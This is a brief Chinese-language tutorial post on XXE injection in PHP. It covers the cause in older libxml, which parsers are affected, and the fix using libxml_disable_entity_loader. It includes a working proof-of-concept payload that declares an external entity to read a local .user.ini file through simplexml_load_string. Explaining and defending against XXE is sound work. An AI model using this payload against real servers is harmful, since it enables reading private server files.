xxe hacking

發(fā)布時間：2020-07-16 07:36:41 來源：網(wǎng)絡(luò) 閱讀：631 作者：serverxx0 欄目：安全技術(shù)

漏洞成因:

XML 文件的解析依賴 libxml 庫，而 libxml 2.9以前的版本默認(rèn)支持并開啟了外部實體的引用，服務(wù)端解析用戶提交的 xml 文件時未對 xml 文件引用的外部實體（含外部普通實體和外部參數(shù)實體）做合適的處理。

影響:

常見的XML解析方法有：DOMDocument、SimpleXML、XMLReader，這三者都基于libxml庫解析XML，所以均受影響，xml_parse函數(shù)則基于expact解析器，默認(rèn)不載入外部DTD,不受影響。

修復(fù):

php解析xml文件之前使用libxml_disable_entity_loader(true) 來禁止加載外部實體。

***代碼:

<?php
$xmlstring = <<<EOF
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE ANY [
 <!ENTITY xxe SYSTEM "file:///E:/wwwroot/.user.ini">
]>
<X>&xxe;</X>
EOF;

$xml = simplexml_load_string($xmlstring);

print_r($xml);
?>

xxe hacking

向AI問一下細(xì)節(jié)

xxe hacking

猜你喜歡

最新資訊

相關(guān)推薦

相關(guān)標(biāo)簽